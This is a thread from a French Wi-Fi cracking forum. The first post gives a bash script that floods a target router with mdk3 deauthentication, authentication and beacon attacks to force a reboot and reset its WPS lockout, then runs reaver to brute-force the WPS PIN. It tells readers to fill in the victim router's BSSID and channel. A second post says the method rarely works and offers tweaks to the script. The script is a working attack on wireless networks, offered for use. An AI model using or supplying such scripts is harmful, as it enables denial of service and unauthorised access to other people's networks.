Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-08-2014 14:32:04

T!g3r
Nouveau membre

Lever AP-RATE limit par EAPOL flood ( seulement vieux modele cisco )

ReaverWPS By T!G3R

Avant tout : Quelque rappel.

-Wi-Fi Protected Setup (WPS) : un standard de réseau local sans fil simple et sécurisé. Conçu par la Wi-Fi Alliance, il a été lancé début 2007.
Le but du protocole WPS est de simplifier la phase de configuration de la sécurité des réseaux sans fil. Il permet à des particuliers ayant peu de connaissances sur la sécurité de configurer un accès WPA, supporté par les appareils Wi-Fi.
Ce standard met l'accent sur l'utilisabilité et la sécurité, et le concept se décline en quatre façons d'établir un réseau domestique. L'utilisateur voulant ajouter un périphérique au réseau peut utiliser au choix :
la méthode PIN (Personal Identification Number), un numéro à lire sur une étiquette (ou un écran) du nouvel appareil, et à reporter sur le « représentant » du réseau (le point d'accès ou le registrar).
la méthode PBC, où l'utilisateur presse un bouton (physique ou virtuel), à la fois sur le point d'accès et sur le nouvel appareil.
la méthode NFC, où l'utilisateur approche le nouvel appareil du point d'accès pour établir une communication en champ proche entre eux.
la méthode USB (Comme D-link le fait pour la plupart des clés usb wifi), où l'utilisateur se sert d'une clé USB pour transférer les données entre le nouvel appareil et le point d'accès.

Commençons

Chez certain routeur l'attaque WPS est vulnérable.
J'ai créer un script tout-bête qui sert a débloquer le WPS d'un routeur.

echo
while true
do
rm -f reaverlog.txt
xterm -e airodump-ng -i mon0 -c 11 --bssid AA:BB:CC:DD:EE:FF &
xterm -e airodump-ng -i mon0 -c 1 --bssid  AA:BB:CC:DD:EE:FF &
xterm -e timeout 2m mdk3 mon0 a -a AA:BB:CC:DD:EE:FF &
xterm -e timeout 2m mdk3 mon0 d -c X &
xterm -e timeout 2m mdk3 mon0 b -t AA:BB:CC:DD:EE:FF -c X &
xterm -e timeout 2m mdk3 mon0 m -t AA:BB:CC:DD:EE:FF
xterm -e wash -i mon0
reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv -a -S -N -r 2:60 >> reaverlog.txt &
tail -f reaverlog.txt &
          if 
                tail -f reaverlog.txt | grep -q Detected
         then
                killall reaver
                killall wash
                killall tail
        fi
killall airodump-ng &
sleep 5m
done

Ce script sert de faire un reboot du routeur qui automatiquement active le WPS. (Unlock)

Utilisations

Dans le script , il faut modifier quelque trucs avant de lancer l'attaque.

-le bssid = remplacer : "AA:BB:CC:DD:EE:FF" par le BSSID du routeur de la victime.

-le channel = Remplacer : "X" par le channel du routeur de la victime.

Voila , ensuite vous pouvez lancer le script dans un terminal.

Vidéo de même type d'attaque.

https://www.youtube.com/watch?v=_uVvi8qf7JY

T!G3R

Dernière modification par T!g3r (11-08-2014 14:38:40)

Signature.png

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-08-2014 12:30:49

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : Lever AP-RATE limit par EAPOL flood ( seulement vieux modele cisco )

bonjour et merci pour l'apport

Par contre ton titre est fallacieux ( script pour débloquer n"importe quel routeur " ) pour ne pas dire.... ridicule.
Utiliser mdk3 pour reinicier un routeur et par ce fait lever le blocage du WPS ne fonctionne pas sur 99% des points d’accès....
Evite dorénavant s'il te plait les titres sensationnalistes bidons, nous ne sommes pas nées de la dernière pluie, nous comprenons l'anglais et connaissons le video que tu as mis en lien et connaissons de puis belle lurette mdk3 .
Et c'est assez ridicule prétendre débloquer le AP rate limit de n'importe quel routeur avec trois lignes de commandes mdk3....
Tu crois que tu es le premier a essayer?   roll tongue

xterm -e timeout 2m mdk3 mon0 m -t AA:BB:CC:DD:EE:FF

pourquoi tu n'augmentes pas le temps de time out au lieu de mettre trois commandes identiques ?

Tu peux utiliser la commande " read " pour faire que ton script soit interactif wink

Je modifie ton titre , nous ne pouvons décemment pas  pas laissé quelque-chose d'aussi hallucinant, nous sommes sur un forum sérieux , pas sur une chaine de télé achat ou dans un magasine type paris-match wink

Annonce